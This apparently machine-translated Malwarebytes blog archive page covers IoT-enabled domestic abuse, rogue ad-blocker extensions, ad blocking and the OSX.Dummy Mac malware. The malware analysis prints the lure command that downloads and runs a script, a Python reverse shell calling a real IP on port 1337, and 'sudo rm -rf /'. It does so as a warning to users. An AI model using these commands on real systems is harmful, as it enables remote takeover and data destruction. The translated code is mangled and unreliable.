Archivo de categoría Malwarebytes Empresas

Pormalwarebytes

Abuso interno de la IoT: ¿qué podemos hacer para detenerlo?

Abuso interno de la IoT: ¿qué podemos hacer para detenerlo?

Abuso interno de la IoT: ¿qué podemos hacer para detenerlo?

Publicado: 11 de julio de 2018 por 
Última actualización: 10 de julio de 2018

Hace unos 40 años, la película de ciencia ficción / terror Demon Seed contó la historia de una mujer encarcelada lentamente por una inteligencia artificial, que invadió el sistema de hogar inteligente que su esposo había diseñado para administrarlo. La AI cerró puertas, ventanas, apagó las comunicaciones e incluso puso una versión sintetizada de ella en la pantalla en la puerta principal para asegurar a los visitantes que estaba «bien».

La realidad, por supuesto, es que ella era todo menos eso. Ha habido un sinfín de obras de ficción en las que la tecnología inteligente que micromaneó el entorno hogareño se ha vuelto deshonesta . Lamentablemente, esas obras de ficción se desangran en la realidad.

En 2018, de repente tenemos el equivalente en el mundo real en hogares y detrás de puertas cerradas. Hablaremos sobre los problemas actuales momentáneamente, pero primero echemos un vistazo cómo llegamos aquí echando un vistazo atrás hace unos 15 años.

Robo de contraseñas y spyware de PC

Durante años, un subconjunto de socios abusivos con conocimientos técnicos ha colocado spyware en computadoras o dispositivos móviles, contraseñas robadas y, en general, ha guardado pestañas en su otra mitad. Esto a menudo puede conducir a la violencia, y como resultado, muchas estrategias para defenderse contra esto se han elaborado a lo largo de los años. Efectivamente me involucré en la seguridad debido a un caso de abuso relacionado con la tecnología , y di muchas charlas sobre este tema desde 2006  junto a representantes de NNEDV (Red Nacional para Terminar con la Violencia Doméstica).

El spyware para el consumidor es un gran problema , y los gigantes tecnológicos como Google están financiando programas diseñados para ayudar a los cónyuges abusados ​​a salir de escenarios de abuso tecnológico.

La ola móvil y el control social

Después de que el spyware basado en PC se convirtió en una herramienta para los abusadores, se produjo un aumento en el «control coercitivo», el acto de exigir revisar correos electrónicos, mensajes de texto, mensajes directos y más enviados a teléfonos móviles. Los socios abusivos que exigen ver mensajes SMS siempre han sido una cosa, pero llevar toda tu existencia en línea y tirarla a un dispositivo de bolsillo siempre aumentaría las apuestas para la gente.

El control coercitivo es un problema tan serio que el Reino Unido tiene leyes específicas contra él , y el acto se convirtió en un crimen en 2015. Si lo declaran culpable, puede esperar ver un máximo de cinco años de prisión o una multa, o ambos en el peor de los casos. De la descripción del control coercitivo:

El comportamiento coercitivo o de control no se relaciona con un solo incidente, es un patrón intencional de incidentes que ocurren con el tiempo para que un individuo ejerza poder, control o coacción sobre otro.

Mantenga el «patrón determinado de incidentes que ocurren con el tiempo para que un individuo ejerza poder o control» en la descripción a medida que pasamos a la siguiente sección sobre el abuso del Internet de las cosas (IoT), porque es relevante.

Internet de las cosas: control total

Un concentrador de control de Internet of Things podría ser un complejo servicio de nube remota que alimenta una multitud de dispositivos, pero para la mayoría de las personas, es un dispositivo que se instala en el hogar y ayuda a encender y controlar electrodomésticos y otros sistemas, generalmente con algún nivel de acceso a Internet y la posibilidad de control adicional a través de un teléfono inteligente. Podría estar a cargo de cámaras de seguridad o sensores de movimiento, o podría ser el paquete completo: calefacción y refrigeración, iluminación, ventanas, cerraduras de puertas, alarmas contra incendios, hornos, temperatura del agua, prácticamente cualquier cosa que se te ocurra.

Los socios abusivos no han tardado en aprovechar esta funcionalidad recién incorporada, con numerosos relatos de ellos que hacen la vida imposible para sus seres queridos, efectivamente atrapados en una reelaboración 24/7 de una casa distópica de ciencia ficción.

Su crueldad solo está limitada por lo que no pueden enganchar a la red general. Encerrar al cónyuge en su lugar de residencia y luego encender el fuego, abanicarlo, encender y apagar luces, deshabilitar servicios, grabar conversaciones, activar alarmas de seguridad ruidosas; el compañero abusado está casi enteramente a su merced.

Hay todo tipo de implicaciones extrañas generadas por este tipo de abuso de tecnologías e individuos en el mundo real. ¿Qué sucede si alguien tiene una reacción adversa al cambio de temperatura severo? ¿Un ataque epiléptico debido a las luces que parpadean rápidamente? ¿Qué tal si alguien apaga las alarmas de humo o la tecnología de respuesta de emergencia de la policía y luego el lugar se incendia o alguien irrumpe?

Alguien podría ser responsable de una muerte, pero ¿cómo lo resolvería la policía, y mucho menos saber dónde echar la culpa?

Por supuesto, esas son situaciones en las que los cónyuges aún viven juntos. También hay escenarios en los que la pareja se ha separado, pero el abusador aún tiene acceso a la tecnología de IoT, y ellos comienzan a jugar con sus vidas de forma remota. Uno es un enfoque algo más directo que el otro, pero ninguno es particularmente bueno para la persona que lo recibe.

Un reto desalentador

Desafortunadamente, este es un hueso duro de roer. En términos generales, los consejos dados a los sobrevivientes de abuso doméstico tienden a errar por el lado de la extrema precaución, porque si el abusador nota la más mínima irregularidad, buscarán represalias. Con computadoras y más formas «tradicionales» de skullduggery basadas en tecnología, generalmente hay algunas partes de margen de maniobra.

Por ejemplo, un compañero abusado puede tener un dispositivo móvil, que está inmediatamente fuera del alcance del abusador en el momento en que salen, suponiendo que no lo hayan manipulado. En el escritorio, la navegación en modo incógnito es útil, al igual que los sitios web de abuso doméstico que ofrecen sugerencias y  botones de cierre rápido en caso de que el abusador esté cerca.

Sin embargo, incluso entonces, existe el riesgo: el abusador puede conservar los registros de la red o usar software de vigilancia, y los intentos de «ocultar» los datos de navegación pueden levantar sospechas. De hecho, este es un ejemplo donde los sitios web que se mueven lentamente hacia los HTTP son beneficiosos, porque un abusador no puede ver los datos del sitio web. Aun así, es posible que aún vean las URL y vuelvan al punto de partida.

Con IoT, todo es mucho más difícil en situaciones de abuso doméstico.

Una gran cantidad de tecnología de IoT es increíblemente insegura porque la funcionalidad es donde está; seguridad, no tanto. Es por eso que usted ve tantas historias sobre webcams  transmitidas a través de Internet, o juguetes que hacen cosas raras , o la tostadora ocasionalmente conectada a Internet.

En comparación, los centros principales que controlan todo en el hogar suelen estar bastante bloqueados, especialmente si son una marca conocida como Alexa o Nest.

En estas situaciones, cuanto más bloqueado esté el dispositivo, más difícil será sugerir soluciones de evasión para las personas amenazadas. Difícilmente pueden saltar y comenzar clandestinamente a manipular la tecnología sin previo aviso; francamente, la gente tiende a darse cuenta si un dispositivo físico no actúa de manera mucho más rápida que su pieza encubierta de spyware diseñada para tomar correos electrónicos de una computadora portátil.

Todo tipo de cosas extrañas pueden salir mal con algún spyware comprado. Tal vez haya un servidor al que necesite llamar, pero el servidor está desconectado temporalmente o se ha apagado. Tal vez la conexión a Internet es un poco escamosa, y no está enviando datos a la base. ¿Qué pasa si el codificador no era bueno y algo al azar comenzó a desmoronarse? Hay tantas variables involucradas que muchos abusadores podrían no saber qué hacer al respecto.

Sin embargo, se espera que un poco estándar de IoT comercial funcione de cierta manera y cuando de repente no lo haga. El abusador lo sabrá.

Abordando el problema

A pesar de los desafíos, hay algunas cosas que podemos hacer para al menos obtener un punto de apoyo contra los atacantes nacionales.

1) Mantenga un registro: con la advertencia estándar de que hacer una acción X puede atraer la atención Y, un registro es un pilar de los casos de abuso. Prácticamente todos los que han experimentado este abuso y lo hablan públicamente dirán lo mismo: sean conscientes de lo obvio que es su registro . Un libro puede funcionar para algunos, el texto ofuscado en el código puede funcionar para otros (aunque podría atraer un interés injustificado si se descubriera). Puede ser más fácil esconder un libro que mantenerlo alejado de su computadora portátil.

Por supuesto, adaptarse a la situación en cuestión; si ya no vives con la pareja abusiva, es probable que no lean tu diario en papel guardado en un armario. ¿Qué tal una aplicación móvil? Hay herramientas en las que puede detallar información que no se guarda en el dispositivo a través de programas diseñados para parecerse a aplicaciones meteorológicas . Si puede construir una imagen de cada vez que la calefacción se vuelve insoportable, o las luces entran en sobremarcha, o las alarmas comienzan a zumbar, estos son datos valiosos para la aplicación de la ley.

2) La correlación es una cosa maravillosa. Muchos de los dispositivos más populares mantendrán estadísticas detalladas de uso. Nest, por ejemplo, «recopila estadísticas de uso del dispositivo» (2.1, Privacidad del usuario) como se menciona en este documento de Black Hat [PDF]. Si alguien eventualmente va a la policía con sus registros, y la policía puede obtener estadísticas de uso para (digamos) fluctuaciones extremas de temperatura, o puertas cerradas, o bombillas que se vuelven locas, entonces las cosas rápidamente parecen problemáticas para el abusador.

Este sería especialmente el caso donde las estadísticas registradas en el dispositivo coinciden con lo que haya escrito en su diario físico o guardado en su aplicación móvil segura.

3) Este es un problema bastante nuevo que ha salido a la luz, y la mayoría de las discusiones al respecto en círculos tecnológicos están llenas de gente de tecnología que dice: «No tenía idea de que esto fuera una cosa hasta ahora». Si hay un refugio local para cónyuges abusados ​​y usted es bueno con esta área de tecnología / seguridad / privacidad, es posible que desee aparecer y ver si hay algo que pueda hacer para ayudar a transmitir información útil. Es probable que no tengan a nadie en el personal que pueda ayudar con este caso particular. Cuanto más compartimos entre nosotros, más podremos apoyar a los socios abusados ​​para superar sus situaciones.

4) Si ha escapado de un cónyuge abusivo pero ha traído tecnología con usted, no hay garantía de que no haya sido completamente comprometida. ¿Ustedes dos tienen acceso de administrador a los dispositivos? ¿Has cambiado la (s) contraseña (s) desde que te mudaste? ¿Qué tipo de información se revela en la consola de administración? ¿Menciona las direcciones IP utilizadas, quizás la ubicación geográfica, o tal vez una nueva dirección de correo electrónico que utilizó para configurar las cosas de nuevo? Si ha estado experimentando cosas extrañas en su hogar desde que volvió a enchufar todo, y se parecen al tipo de engaño enumerado anteriormente, es muy posible que el socio abusivo todavía no sirva para nada.

Hemos detectado al menos un ejemplo en el que una organización ha realizado un trabajo de depuración de IoT . La idea de «hacerles fantasmas», que mantiene al menos un dispositivo comprometido en funcionamiento para hacer que el abusador piense que todo está bien, es interesante, pero potencialmente no sin riesgos. Si es posible, nuestro consejo es destruir todas las piezas de tecnología que se hayan traído para el viaje. IoT es algo tan complejo de configurar, con tantas partes móviles, que es imposible decir con certeza que todo ha sido exorcizado tecnológicamente.

Sin solución rápida

Sería genial si hubiera algún tipo de solución mágica tecnológica que pudiera solucionar este problema, pero como verás después de indagar sobre el tema «IoT scrub job», muchos profesionales de seguridad recién están comenzando a entender este tipo. del asalto digitalizado, así como las mejores formas de combatirlo. Al igual que con todo el abuso doméstico, la precaución es clave, y no debemos apresurarnos a dar consejos que potencialmente podrían poner a alguien en mayor peligro. Frustrante, una sorprendente cantidad de los mejores resultados en los motores de búsqueda para ayudar con estos tipos de ataques da como resultado 404 páginas de error o sitios web que simplemente ya no existen.

Claramente, todos necesitamos mejorar nuestro juego en círculos tecnológicos y ver qué podemos hacer para poner fuera de combate este espectáculo de terror habilitado para IoT antes de que pierda el control. A medida que IoT continúa integrándose en la vida cotidiana de las personas, de maneras que no pueden ser fácilmente arrancadas después, el potencial de daño masivo a los miembros más vulnerables de la sociedad nos está mirando a la cara. Tenemos que estar a la altura del desafío.

Pormalwarebytes

Bloqueamos bloqueadores de anuncios sombríos

 

 

Bloqueamos bloqueadores de anuncios sombríos

 

 

Publicado: 11 de julio de 2018 por 

Algunos de ustedes se han comunicado con nosotros en relación con el bloqueo por parte de Malwarebytes de ciertas extensiones de bloqueo de anuncios, o una afluencia de notificaciones de bloqueo web. Lo primero es lo primero, esto no es un falso positivo. Recientemente, en su blog, AdGuard descubrió que se encontraron numerosas extensiones de bloqueo de anuncios maliciosos en la tienda de Google Chrome. Según un artículo de ZDNet , las extensiones maliciosas se han eliminado desde la tienda, sin embargo, se estima que 20 millones de dispositivos descargaron estas aplicaciones mientras aún estaban en línea, es posible que usted tenga uno de esos dispositivos.

Las extensiones se utilizan básicamente para convertir el navegador en un zombie bajo el control de un atacante remoto, básicamente, agregar su dispositivo a una botnet. Como nuestra capacidad para eliminar extensiones es limitada, estamos bloqueando los dominios a los que llegan las extensiones maliciosas, por lo que, como mínimo, los usuarios no tendrán sus sistemas controlados por un cibercriminal.

Si obtiene ventanas emergentes como las anteriores, consistentemente, puede estar ejecutando una de las extensiones maliciosas. Aquí hay una lista completa:

  • AdRemover para Google Chrome ™
  • uBlock Plus
  • Adblock Pro
  • HD para YouTube ™
  • Webutation

Si es así, tu mejor opción es eliminarlo de tu navegador.

Consulte nuestra guía sobre Adware , que incluye una sección sobre la eliminación de extensiones.

Echa un vistazo a los nombres de algunas de estas «extensiones», ¿notas algo? Adblock Pro, uBlock, YouTube, todos los grandes nombres y palabras de moda que hacen que estas extensiones parezcan más legítimas, agregan el hecho de que los comentarios falsos y las revisiones se crean todo el tiempo para este tipo de herramientas y, al final del día, el criminal es contando con su capacidad para no darse cuenta de que «esta no es la aplicación que está buscando».

Tenga en cuenta lo que instala en su navegador y, en general, en su computadora, al igual que los DVD baratos que puede encontrar en la tienda, que tienen títulos increíblemente similares a una gran película de gran éxito , que la gente que no está tan familiarizada con la el material original pasa por alto el hecho de que están comprando una imitación. Piense en esto de la misma manera con las extensiones y complementos y complementos para sus navegadores, hay algunos muy buenos, pero hay MUCHOS imitadores sombríos.

Asegúrese de revisar las opiniones de los usuarios, los números de descarga e incluso las recomendaciones externas (buscar el «mejor bloqueador de anuncios» podría ser un buen lugar para comenzar). Esto asegurará que haya instalado la herramienta correcta que hará el mejor trabajo.

Gracias por leer, navegación segura, ¡nos vemos la próxima vez!

Pormalwarebytes

Todos están bloqueando anuncios, ¿por qué no?

Publicado: 9 de julio de 2018 por 
Última actualización: 4 de julio de 2018

Esta publicación puede alterar algunas plumas. Pero no estamos aquí para ofrecer consejos a los editores sobre cómo generar mejores ingresos para su marca. Por el contrario, estamos aquí para ofrecer el mejor consejo sobre cómo mantener un entorno seguro y protegido.

Si no está bloqueando anuncios en su PC y dispositivo móvil, ¡debería hacerlo! Y si conoce a alguien que no está bloqueando anuncios, envíeles esta publicación. Porque en esta serie de dos partes, vamos a disipar algunos de los mitos que rodean el bloqueo de anuncios, y cubriremos las razones por las que debería estar bloqueando los anuncios en su red y dispositivos.

A continuación, realizaremos un seguimiento en la Parte 2 de esta serie al analizar herramientas y configuraciones comunes para ayudarlo a aprovechar al máximo su experiencia de navegación.

Has escuchado la charla y visto los mensajes en banners en línea. Usted es consciente de las disputas y la provocación de los editores y anunciantes de que el bloqueo de anuncios es un acto moralmente desmedido cuyos usuarios merecen un destierro directo de la web. Tal vez te han influido las súplicas de los propietarios de sitios web y tienen empatía hacia las frágiles limitaciones presupuestarias de tus sitios favoritos. O tal vez no comprenda los riesgos asociados con el seguimiento y la publicidad en línea y piense que si no hace clic en anuncios estará bien.

No te dejes engañar El bloqueo de anuncios proporciona una capa de seguridad vital que no solo corta un vector potencial para los ataques maliciosos en línea, sino que también bloquea los complementos de seguimiento que invaden la privacidad para recopilar y recopilar su información personal. No solo eso, sino que bloquea los anuncios y rastreadores en línea tiene la ventaja adicional de conservar el ancho de banda y la duración de la batería, aumentar los tiempos de respuesta del sitio web y, en general, mejorar la experiencia general del usuario. Por lo tanto, usar un bloqueador de anuncios no solo protege su dispositivo, sino que también brinda una mejor experiencia general para el usuario. ¿Qué no se podría amar?

¡Es todo un montón de alboroto!

Los anunciantes, editores y propietarios de sitios web desprecian las conversaciones sobre el bloqueo de los anuncios molestos que aparecen en sus páginas web, especialmente los anuncios que compiten más agresivamente por su atención (y, por lo tanto, pagan las facturas de los propietarios del sitio web). Todos los hemos visto. Estamos hablando de anuncios que reproducen automáticamente anuncios o clips de noticias tan pronto como se carga la página. Brillantes, llamativos ventanas emergentes y superposiciones de páginas que deben hacerse clic antes de ver el contenido deseado. Incluso los resultados patrocinados que aparecen en los listados de búsqueda. ¡Están en todos lados!

Cientos de miles de millones de impresiones de anuncios se producen cada mes, y se estima que los ingresos publicitarios digitales para publicidad en línea superarán los $ 237,000 millones en 2018 . Con tantas impresiones para ser atendidas, no es de extrañar que los operadores de sitios web estén despejando el espacio y abriendo el camino para que los anunciantes atemperen el panorama del sitio web.

Lista de búsqueda mostrada dentro de Google

Y obtenemos que las impresiones de anuncios son el alma de muchos operadores de sitios web y editores que dependen de los clics como mecanismo principal para generar ingresos. Algunos incluso pueden argumentar que los ‘clics crean trabajos’.

Pero enfrentémoslo. En la mayoría de los casos, los anuncios son una mierda! A los anunciantes les gusta impulsar la noción de «anuncios aceptables», «publicidad no intrusiva» y «cantidad razonable de impresiones», pero esta es una retórica diseñada para influir en la opinión de una sociedad impresionable, y es todo un poppycock si Pregúnteme.

A la mayoría de las personas no les gustan los anuncios. Ellos nunca tuvieron. Es por eso que las videograbadoras se volvieron populares en los años 80. Los dispositivos permitieron a los usuarios configurar grabaciones y luego omitir anuncios según su conveniencia más adelante. Es por eso que los DVR se convirtieron en la corriente principal hace años, y por qué las personas acuden a servicios de transmisión como Netflix ahora. Es incluso la razón por la que las personas omiten los primeros minutos de una película.

Los anuncios disminuyen la experiencia general del usuario al forzar la atención del consumidor en otra parte, y crean un retraso o una molestia en la capacidad de ingerir el contenido preferido. Los listados «patrocinados» de un sitio web a menudo consumen mucho más del paisaje de la página que el contenido real, lo que hace que dedique más tiempo a buscar los artículos deseados. Esto puede llevar a que los consumidores paguen más de lo que se hubiera pagado con un competidor no patrocinado. Y luego están los anuncios que son deliberadamente desagradables o reproducen sonidos recurrentes en una pequeña caja en la esquina de la ventana. Todos son simplemente terribles de soportar.

Si se tratara simplemente de no disfrutar el contenido, entonces este punto sería discutible. Sin embargo, los anuncios en línea representan una amenaza y proporcionan un vector de infección para que los actores malintencionados puedan lanzar ataques de malware. Esto puede convertir incluso los sitios web de mayor reputación en posibles sistemas de entrega para los autores de malware.

El malware puede ser entregado dentro de ese anuncio

Los anuncios permiten pequeños anuncios divertidos y llamativos que pueden jugar juegos y cuestionarios, pero al mismo tiempo esta funcionalidad representa un gran riesgo para los consumidores.

La publicidad maliciosa tiene la capacidad de afectar incluso a los usuarios más cuidadosos debido a la naturaleza de cómo los anuncios están diseñados para ejecutar código automáticamente cuando se cargan. Los atacantes pueden ( y lo hacen ) adjuntar códigos de exploits maliciosamente ocultos a anuncios que de otro modo serían inocuos para productos conocidos y luego enviar estos anuncios para su publicación a sitios web conocidos y de buena reputación.

No se deje engañar por este anuncio de Best Buy. ¡No es real!

Si bien muchas de las grandes redes publicitarias realizan la diligencia debida y buscan ese contenido malicioso antes de su publicación, existen docenas, sino cientos de redes publicitarias a las que un delincuente puede enviar su código malicioso. Y no todas esas compañías poseen los mismos estándares que sus contrapartes multimillonarias. Teniendo en cuenta la velocidad y la naturaleza del proceso de pujas en tiempo real para los anuncios en línea (un proceso fascinante que merece una publicación propia) no es de extrañar que los anuncios malos puedan pasar incluso las redes publicitarias más bien intencionadas.

$ 5.00 y 10 minutos es todo lo que se necesita con esta red publicitaria.

Considere por un momento esta  publicación de blog publicada por Google a principios de este año, que arroja algo de luz sobre la cantidad de anuncios maliciosos que fueron bloqueados a través del ecosistema publicitario. En la publicación, Google estipula que se eliminaron 3,2 mil millones de anuncios en 2017 por infringir las políticas publicitarias. Eso se traduce en 100 anuncios por cada segundo, de cada día, durante todo el año. De estos anuncios, 79 millones empujaban sitios web cargados de malware. Y eso se suma a los más de 320,000 editores que fueron incluidos en la lista negra, y más de 1 millón de sitios web y aplicaciones que fueron eliminados o bloqueados.

¡Son muchos anuncios malos!

Dejando a un lado la capacidad de Google para bloquear el contenido malicioso tal como aparece en su red, algunos pueden afirmar que con tantas cosas malas, algunas cosas pueden pasar desapercibidas devez en cuando.

Y, para que no nos olvidemos, hay una plétora de otras compañías de sitios web, noticias y publicidad sin los medios o el deseo de vigilar el contenido. Los actores malintencionados pueden lanzar campañas altamente orientadas, que solo pueden ser visibles para un pequeño grupo de personas y que a menudo pueden pasar desapercibidas para los mecanismos y sistemas de seguridad. ¿Quién quiere ser el conejillo de indias y ofrecer su computadora a los atacantes cuando ocurren tales fallas?

No me sigas, hermano

Todos estamos familiarizados con el escándalo de Cambridge Analytica que involucra la recopilación de aproximadamente 87 millones de registros de Facebook. El evento altamente publicitado ha llevado a procedimientos de insolvencia en contra de la empresa (aunque Cambridge Analytica puede haber sido resucitado recientemente bajo el nombre de Data Propria ). La gente se indignó en parte porque la empresa había recopilado y almacenado información en amplios sectores de la población sin su consentimiento. Pero lo que esas mismas personas pueden no entender es que Cambridge Analytica no está solo en esta práctica.

Existen numerosas organizaciones que van desde pequeñas operaciones de una y dos personas, hasta corporaciones de millones de dólares que participan en el proceso de recopilación y venta de datos de consumidores. Los corredores de datos, los almacenes de datos y las plataformas de intercambio de datos proporcionan herramientas y servicios no solo para recopilar información, sino también para clasificar y organizar la información de manera que los anunciantes puedan dirigirse a grupos específicos de usuarios.

Agente de datos en línea que ofrece «datos que solo tienen segundos de antigüedad»

Pocas de estas organizaciones tienen el consentimiento expreso de los usuarios para recolectar y almacenar su información, y muchas carecen incluso de los protocolos de seguridad más básicos para proteger y mantener la información una vez que se recolecta.

Considere la exposición reciente de la base de datos que rodea al intermediario de datos, Exactis . Hace poco se acusó a la compañía de tener un servidor pobremente asegurado, que comprometió casi 340 millones de registros individuales que contenían todo, desde direcciones, números de teléfono y direcciones de correo electrónico, hasta más de 400 puntos de datos diferentes de hábitos, intereses y pasatiempos. Todo tipo de otros detalles personales son rastreados, cosechados y almacenados en estas bases de datos; todo desde la edad hasta el tamaño de la ropa de una persona y el historial de compras. ¿Fuma, bebe o disfruta del juego? Eso está ahí, también.

Exactis tiene más de 3,5 mil millones de registros, con información sobre la mayoría de nosotros

¿Y quién exactamente es Exactis ? La compañía afirma ser un compilador y recopilador líder de datos de empresas y consumidores. La información recopilada por la empresa se utiliza para la creación de perfiles de clientes y para ayudar a los especialistas en marketing a identificar rasgos descriptivos y segmentos de clientes para ayudar a comprender mejor el comportamiento. Esta información se puede usar para dirigir publicidad dirigida a grupos específicos.

El sitio web de la compañía afirma poseer 3,5 mil millones de registros en 218 millones de personas y 110 millones de hogares. Cuando se le preguntó de dónde se originó la información, Vinny Troia, fundador de Night Lion Security, fue citado diciendo: «Parece que esta es una base de datos con prácticamente todos los ciudadanos estadounidenses en ella. No sé de dónde vienen los datos, pero es una de las colecciones más completas que he visto en mi vida «.

Si bien es posible que no sepamos con certeza, es probable suponer que al menos algunos de esos registros se obtienen mediante el uso de rastreadores en línea y servicios que se ejecutan silenciosamente en segundo plano, rastreando y registrando su comportamiento cada vez que navega en línea.

¿Por qué seguimos tolerando este tipo de recopilación de datos ilícitos? No seas como Steve Huffman, el CEO de Reddit que se permitió ser el blanco de un anuncio de Facebook con el propósito de solicitar empleo. En su lugar, use un bloqueador de anuncios, que no solo bloquea los rastreadores dirigidos que ponen en peligro su información personal y divulgue sus secretos al mejor postor, sino que también evitará que se muestre el anuncio orientado, reduciendo así su exposición a la infección y la solicitación.

No, no es moralmente inconsciente usar un bloqueador de anuncios

A pesar de los avisos, las súplicas de los propietarios de sitios web y la posición de anunciantes y editores de que el bloqueo de anuncios destruirá Internet tal como lo conocemos, no existen leyes contra el uso de un bloqueador de anuncios para evitar que aparezca contenido objetable en cualquier dispositivo que usted posea. o usar.

En un caso largamente seguido que trascendió hasta el Tribunal Supremo alemán, el editor europeo Axel Springer fue derrotado en una batalla de varios años contra el editor de Adblock Plus Eyeo, después de no convencer al tribunal de que el bloqueador de anuncios violó la ley de competencia y participando en políticas comerciales legalmente dudosas. (Su modelo de negocio permitió desbloquear anuncios considerados «aceptables», así como aquellos que pagaron por tal distinción).

El fallo judicial pone fin a la búsqueda de Springer de que el bloqueo de anuncios se considere ilegal. La decisión también justifica que los usuarios continúen utilizando el software de bloqueo para evitar que se muestren contenidos no deseados u objetables.

Es probable que los estadounidenses tengan protecciones de bloqueo de publicidad igualmente fuertes, si no más fuertes que nuestros amigos alemanes.

Al buscar a través de expedientes y documentos proporcionados por Justia.com , Eyeo, la empresa matriz de AdBlock Plus, no muestra un solo caso que la empresa haya tenido que defender debido a su práctica de bloquear anuncios. Y realmente, es casi un poco exagerado imaginar a un jurado estadounidense persuadido por el argumento de que los anunciantes tienen derecho a mostrar contenido, pero que los consumidores no tienen el derecho de bloquear dicho contenido cuando no lo aprueban.

Por lo tanto, sin leyes que impidan el uso de un bloqueador de publicidad, y con el argumento contrario simplemente reducido al mantra corporativo de «maximizar los beneficios», los consumidores pueden elegir la política de seguridad que mejor se adapte a sus necesidades.

¿Convencido ya?

Hemos visto que los anuncios no solo disminuyen la experiencia del usuario de ingerir contenido, sino que también representan un riesgo sustancial para los consumidores.

El potencial de malvertising para implementar con éxito una carga útil desagradable en su máquina, que puede comprometer su sistema y poner en peligro su seguridad financiera, es real. Peor aún, este tipo de ataques ni siquiera requieren la interacción del usuario y pueden ejecutarse simplemente visitando la página.

Y si la amenaza de la ruina financiera no es importante, entonces debería ser el acto de recolección de datos que invade la privacidad.

La variedad de recopiladores de datos y corredores de datos que hay por ahí es alucinante, y todos luchan por asociar sus acciones y comportamientos a grupos y otras personas con el único objetivo de crear anuncios dirigidos y aumentar las ganancias. La información recopilada por estas organizaciones puede estar poco segura y es una mina de oro potencial para cualquier cibercriminal.

Y si la convicción moral de bloquear los anuncios de sus sitios web favoritos ha impedido hasta ahora la adopción de tecnología de bloqueo de anuncios, entonces el conocimiento de un ecosistema publicitario cada vez mayor y la falta de leyes que impidan los mecanismos de bloqueo de anuncios deberían aliviar esas preocupaciones. . Sí, todos queremos generar ingresos para nuestra marca, pero personalmente prefiero no ayudar a hacer eso en aras de un posible robo de identidad, o peor, tener mi PC comprometida por un ataque de malware que se origina de un anuncio deshonesto en un sitio web popular. .

Subiendo 

En la Parte 2 de esta serie, vamos a echar un vistazo a algunas de las herramientas comunes de bloqueo de anuncios y cómo configurar esas herramientas para que se ajusten a las necesidades del usuario individual. Le mostraremos cómo navegar por configuraciones fáciles de usar que son lo suficientemente simples de usar en la computadora de la abuela. También profundizaremos en algunas configuraciones y herramientas más avanzadas que pueden requerir un cambio en la mentalidad, el uso y la comprensión del usuario antes de darnos cuenta completamente de los beneficios que ofrecen dichas configuraciones.

Cubriremos los anuncios bloqueados en dispositivos móviles y PC, y configuraremos una solución de red para bloquear anuncios en todo su entorno.

Así que estad atentos al blog Malwarebytes , o seguir esta publicación y lo actualizaremos con enlaces una vez disponibles.

Pormalwarebytes

El malware de Mac se dirige a los usuarios de cryptomining

El malware de Mac se dirige a los usuarios de cryptomining

 

La semana pasada, un investigador de seguridad llamado Remco Verhoef anunció el descubrimiento de una nueva pieza de malware de Mac que se distribuye en los grupos de chat cryptomining. Este malware luego fue analizado por Patrick Wardle , quien le dio el apodo apropiado OSX.Dummy.

El malware fue distribuido por usuarios de chat que se hicieron pasar por administradores, quienes publicaron el siguiente script de shell para que los usuarios puedan ejecutar:

cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

Este script descarga un archivo ejecutable llamado script de un sitio malicioso, le otorga permisos ejecutables y luego lo inicia. Este script tiene un tamaño ridículo de 34 megabytes, y parece que no hace más que crear un archivo de script de shell y un demonio de inicio para que siga funcionando.

El script de shell usa Python para abrir un shell inverso al puerto 1337 en un servidor malicioso, lo que le da al pirata informático el acceso continuo a la computadora.

#! / bin / bash
mientras :
hacer
  python -c 'socket de importación, subproceso, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect (("185.243.115.230", 1337)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call (["/ bin / sh", "- i"]); '
  dormir 5
hecho

En general, este malware no es particularmente excepcional, y hace honor al nombre OSX.Dummy de múltiples maneras. Sin embargo, hay algunas cosas interesantes que destacar sobre este malware.

Riesgos planteados por los guiones publicados

El método de distribución es interesante. Las personas en los foros y otras fuentes en línea han estado dando instrucciones que implican ejecutar comandos en la línea de comandos, en la Terminal en una Mac, durante muchos años, y todavía lo hacen hoy.

Como ejemplo, un usuario en los foros de Apple solía dar a los usuarios un comando de shell altamente ofuscado que constaba de decenas de miles de caracteres, con instrucciones para copiarlo y pegarlo en la Terminal para ejecutarlo. Esta secuencia de comandos fue ejecutada por los usuarios de los foros y el resultado del script publicado allí, miles de veces.

Afortunadamente, este script no fue malicioso, pero podría haberlo sido fácilmente, y su naturaleza ofuscada debería haber despertado sospechas. Sí, los usuarios todavía lo ejecutaron, sin entender lo que hacía, porque confiaban en un extraño en un foro.

Hubo otros casos en el pasado de que se publicaron scripts que eran realmente de naturaleza maliciosa. El más conocido de estos fue un truco infame donde los usuarios debían ejecutar el siguiente comando para resolver cualquier problema que tuvieran:

sudo rm -rf /

Desafortunadamente para los usuarios que realmente siguieron instrucciones como estas, este comando realmente borra el disco duro.

Por lo tanto, hay un precedente de sospecha de las secuencias de comandos de shell publicadas en línea, pero aun así, muchas personas seguirán ejecutando scripts muy sospechosos sin ningún cuidado. Se alienta a los lectores a educar a los usuarios sobre los peligros de este comportamiento en cada oportunidad.

Riesgos planteados por infecciones previas

Cuando se ejecuta por primera vez, el script ejecutable solicita una contraseña. Esto se parece al comportamiento de sudo estándar en la línea de comandos, pero en realidad, el malware recibe la contraseña. El malware crea un par de pequeños archivos de datos llamados dumpdummy- one en / Users / Shared / y uno en / tmp / –y almacena la contraseña allí, presumiblemente para un posible uso futuro.

Tener su contraseña almacenada en texto claro dentro de un archivo que pueda ser leída por cualquier persona en la computadora representa una seria amenaza a la seguridad. Peor aún, dado que este archivo solo es información y no es realmente malicioso, es probable que la mayoría del software antivirus no lo detecte. Esto significa que puede haber eliminado la infección, pero el archivo dumpdummypermanece, lo que representa un posible riesgo de seguridad en el futuro.

Esto dista mucho de la primera vez que el malware ha hecho tales cosas. Esto significa que, incluso si su computadora no está infectada actualmente, es muy posible que su contraseña se pueda encontrar en texto claro en algún lugar de su disco duro, como un remanente de una infección anterior. El futuro malware podría estar diseñado para encontrar las ubicaciones de estos archivos creados por el malware anterior, obteniendo acceso a su contraseña de forma gratuita.

Malwarebytes para Mac eliminará dichos rastreos además de los ejecutables maliciosos.

Riesgos planteados por el malware sin firmar

